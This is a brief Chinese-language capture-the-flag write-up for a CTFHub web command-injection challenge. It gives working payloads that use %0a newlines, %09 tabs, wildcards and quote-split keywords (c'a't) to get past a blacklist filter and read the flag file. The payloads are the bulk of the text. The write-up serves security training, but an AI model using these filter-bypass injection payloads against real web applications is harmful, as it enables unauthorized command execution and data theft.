CTFHUB-web-RCE-综合过滤练习

开启题目

查看网页源代码发现这次网页对 | 、 && 、 || 、 \ 、 / 、; ，都进行了过滤处理

发现换行符 %0a 和回车符 %0d 可以进行测试，在 URL 后面拼接访问

127.0.0.1%0als

用 ls flag_is_here 查看 flag 文件中的内容，发现回显为空，发现网页源代码中还过滤了几个字符，分别是 cat 、 flag 、 ctfhub ，这里尝试使用 %09 （ URL 编码中 表示 Tab 制表符）加上通配符进行绕过

127.0.0.1%0als%09*here

127.0.0.1%0acd%09*here%0ac%27a%27t%09*_31687958414358.php